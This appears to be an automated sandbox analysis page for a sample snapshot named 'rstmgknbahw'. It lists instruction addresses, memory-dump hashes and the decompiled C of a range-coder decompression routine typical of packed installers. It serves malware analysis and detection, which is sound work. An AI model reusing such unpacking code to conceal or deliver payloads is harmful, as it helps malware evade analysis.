                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                          • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00405E9D(void* __ecx) {
                          				void* _v8;
                          				void* _v12;
                          				signed int _v16;
                          				unsigned int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v95;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				intOrPtr _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				void _v140;
                          				void* _v148;
                          				signed int _t537;
                          				signed int _t538;
                          				signed int _t572;
                          
                          				_t572 = 0x22;
                          				_v148 = __ecx;
                          				memcpy( &_v140, __ecx, _t572 << 2);
                          				if(_v52 == 0xffffffff) {
                          					return 1;
                          				}
                          				while(1) {
                          					L3:
                          					_t537 = _v140;
                          					if(_t537 > 0x1c) {
                          						break;
                          					}
                          					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                          						case 0:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v116 = _v116 + 1;
                          							_t537 =  *_v116;
                          							__eflags = _t537 - 0xe1;
                          							if(_t537 > 0xe1) {
                          								goto L174;
                          							}
                          							_t542 = _t537 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t576);
                          							_push(9);
                          							_pop(_t577);
                          							_t622 = _t542 / _t576;
                          							_t544 = _t542 % _t576 & 0x000000ff;
                          							asm("cdq");
                          							_t617 = _t544 % _t577 & 0x000000ff;
                          							_v64 = _t617;
                          							_v32 = (1 << _t622) - 1;
                          							_v28 = (1 << _t544 / _t577) - 1;
                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                          							__eflags = 0x600 - _v124;
                          							if(0x600 == _v124) {
                          								L12:
                          								__eflags = _t625;
                          								if(_t625 == 0) {
                          									L14:
                          									_v76 = _v76 & 0x00000000;
                          									_v68 = _v68 & 0x00000000;
                          									goto L17;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t625 = _t625 - 1;
                          									__eflags = _t625;
                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                          								} while (_t625 != 0);
                          								goto L14;
                          							}
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								GlobalFree(_v8);
                          							}
                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                          							__eflags = _t537;
                          							_v8 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								_v124 = 0x600;
                          								goto L12;
                          							}
                          						case 1:
                          							L15:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 1;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                          							_v116 = _v116 + 1;
                          							_t50 =  &_v76;
                          							 *_t50 = _v76 + 1;
                          							__eflags =  *_t50;
                          							L17:
                          							__eflags = _v76 - 4;
                          							if(_v76 < 4) {
                          								goto L15;
                          							}
                          							_t550 = _v68;
                          							__eflags = _t550 - _v120;
                          							if(_t550 == _v120) {
                          								L22:
                          								_v76 = 5;
                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                          								goto L25;
                          							}
                          							__eflags = _v12;
                          							_v120 = _t550;
                          							if(_v12 != 0) {
                          								GlobalFree(_v12);
                          							}
                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                          							__eflags = _t537;
                          							_v12 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								goto L22;
                          							}
                          						case 2:
                          							L26:
                          							_t557 = _v100 & _v32;
                          							_v136 = 6;
                          							_v80 = _t557;
                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                          							goto L135;
                          						case 3:
                          							L23:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 3;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_t72 =  &_v116;
                          							 *_t72 = _v116 + 1;
                          							__eflags =  *_t72;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L25:
                          							_v76 = _v76 - 1;
                          							__eflags = _v76;
                          							if(_v76 != 0) {
                          								goto L23;
                          							}
                          							goto L26;
                          						case 4:
                          							L136:
                          							_t559 =  *_t626;
                          							_t610 = _t559 & 0x0000ffff;
                          							_t591 = (_v20 >> 0xb) * _t610;
                          							__eflags = _v16 - _t591;
                          							if(_v16 >= _t591) {
                          								_v20 = _v20 - _t591;
                          								_v16 = _v16 - _t591;
                          								_v68 = 1;
                          								_t560 = _t559 - (_t559 >> 5);
                          								__eflags = _t560;
                          								 *_t626 = _t560;
                          							} else {
                          								_v20 = _t591;
                          								_v68 = _v68 & 0x00000000;
                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L142;
                          							} else {
                          								goto L140;
                          							}
                          						case 5:
                          							L140:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 5;
                          								goto L173;
                          							}
                          							_v20 = _v20 << 8;
                          							_v112 = _v112 - 1;
                          							_t464 =  &_v116;
                          							 *_t464 = _v116 + 1;
                          							__eflags =  *_t464;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L142:
                          							_t561 = _v136;
                          							goto L143;
                          						case 6:
                          							__edx = 0;
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v56 = 1;
                          								_v136 = 7;
                          								__esi = _v8 + 0x180 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v96 & 0x000000ff;
                          							__esi = _v100;
                          							__cl = 8;
                          							__cl = 8 - _v64;
                          							__esi = _v100 & _v28;
                          							__eax = (_v96 & 0x000000ff) >> 8;
                          							__ecx = _v64;
                          							__esi = (_v100 & _v28) << 8;
                          							__ecx = _v8;
                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                          							__eflags = _v60 - 4;
                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							if(_v60 >= 4) {
                          								__eflags = _v60 - 0xa;
                          								if(_v60 >= 0xa) {
                          									_t103 =  &_v60;
                          									 *_t103 = _v60 - 6;
                          									__eflags =  *_t103;
                          								} else {
                          									_v60 = _v60 - 3;
                          								}
                          							} else {
                          								_v60 = 0;
                          							}
                          							__eflags = _v56 - __edx;
                          							if(_v56 == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L63;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__ecx = _v12;
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                          							goto L43;
                          						case 7:
                          							__eflags = _v68 - 1;
                          							if(_v68 != 1) {
                          								__eax = _v40;
                          								_v132 = 0x16;
                          								_v36 = _v40;
                          								__eax = _v44;
                          								_v40 = _v44;
                          								__eax = _v48;
                          								_v44 = _v48;
                          								__eax = 0;
                          								__eflags = _v60 - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                          								__eax = _v8;
                          								__eax = _v8 + 0x664;
                          								__eflags = __eax;
                          								_v92 = __eax;
                          								goto L71;
                          							}
                          							__eax = _v8;
                          							__ecx = _v60;
                          							_v136 = 8;
                          							__esi = _v8 + 0x198 + _v60 * 2;
                          							goto L135;
                          						case 8:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xa;
                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                          							} else {
                          								__eax = _v60;
                          								__ecx = _v8;
                          								__eax = _v60 + 0xf;
                          								_v136 = 9;
                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                          							}
                          							goto L135;
                          						case 9:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								goto L92;
                          							}
                          							__eflags = _v100;
                          							if(_v100 == 0) {
                          								goto L174;
                          							}
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							_t264 = _v60 - 7 >= 0;
                          							__eflags = _t264;
                          							0 | _t264 = _t264 + _t264 + 9;
                          							_v60 = _t264 + _t264 + 9;
                          							goto L78;
                          						case 0xa:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xb;
                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v44;
                          							goto L91;
                          						case 0xb:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__ecx = _v40;
                          								__eax = _v36;
                          								_v36 = _v40;
                          							} else {
                          								__eax = _v40;
                          							}
                          							__ecx = _v44;
                          							_v40 = _v44;
                          							L91:
                          							__ecx = _v48;
                          							_v48 = __eax;
                          							_v44 = _v48;
                          							L92:
                          							__eax = _v8;
                          							_v132 = 0x15;
                          							__eax = _v8 + 0xa68;
                          							_v92 = _v8 + 0xa68;
                          							goto L71;
                          						case 0xc:
                          							L102:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xc;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t340 =  &_v116;
                          							 *_t340 = _v116 + 1;
                          							__eflags =  *_t340;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							__eax = _v48;
                          							goto L104;
                          						case 0xd:
                          							L39:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xd;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t127 =  &_v116;
                          							 *_t127 = _v116 + 1;
                          							__eflags =  *_t127;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L41:
                          							__eax = _v68;
                          							__eflags = _v76 - _v68;
                          							if(_v76 != _v68) {
                          								goto L50;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L56;
                          							}
                          							L43:
                          							__eax = _v95 & 0x000000ff;
                          							_v95 = _v95 << 1;
                          							__ecx = _v92;
                          							__eax = (_v95 & 0x000000ff) >> 7;
                          							_v76 = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi = _v92 + __eax * 2;
                          							_v20 = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edx;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_v68 = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								_v68 = _v68 & 0x00000000;
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L41;
                          							} else {
                          								goto L39;
                          							}
                          						case 0xe:
                          							L48:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xe;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t161 =  &_v116;
                          							 *_t161 = _v116 + 1;
                          							__eflags =  *_t161;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							while(1) {
                          								L50:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax = _v92;
                          								__edx = __ebx + __ebx;
                          								__ecx = _v20;
                          								__esi = __edx + __eax;
                          								__ecx = _v20 >> 0xb;
                          								__ax =  *__esi;
                          								_v88 = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = (_v20 >> 0xb) * __edi;
                          								__eflags = _v16 - __ecx;
                          								if(_v16 >= __ecx) {
                          									_v20 = _v20 - __ecx;
                          									_v16 = _v16 - __ecx;
                          									__cx = __ax;
                          									_t175 = __edx + 1; // 0x1
                          									__ebx = _t175;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									_v20 = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								_v72 = __ebx;
                          								if(_v20 >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L48;
                          								}
                          							}
                          							L56:
                          							_t178 =  &_v56;
                          							 *_t178 = _v56 & 0x00000000;
                          							__eflags =  *_t178;
                          							goto L57;
                          						case 0xf:
                          							L60:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xf;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t208 =  &_v116;
                          							 *_t208 = _v116 + 1;
                          							__eflags =  *_t208;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L62:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L57:
                          								__al = _v72;
                          								_v96 = _v72;
                          								goto L58;
                          							}
                          							L63:
                          							__eax = _v92;
                          							__edx = __ebx + __ebx;
                          							__ecx = _v20;
                          							__esi = __edx + __eax;
                          							__ecx = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_t222 = __edx + 1; // 0x1
                          								__ebx = _t222;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L62;
                          							} else {
                          								goto L60;
                          							}
                          						case 0x10:
                          							L112:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x10;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t371 =  &_v116;
                          							 *_t371 = _v116 + 1;
                          							__eflags =  *_t371;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							goto L114;
                          						case 0x11:
                          							L71:
                          							__esi = _v92;
                          							_v136 = 0x12;
                          							goto L135;
                          						case 0x12:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v92;
                          								_v136 = 0x13;
                          								__esi = _v92 + 2;
                          								L135:
                          								_v88 = _t626;
                          								goto L136;
                          							}
                          							__eax = _v80;
                          							_v52 = _v52 & 0x00000000;
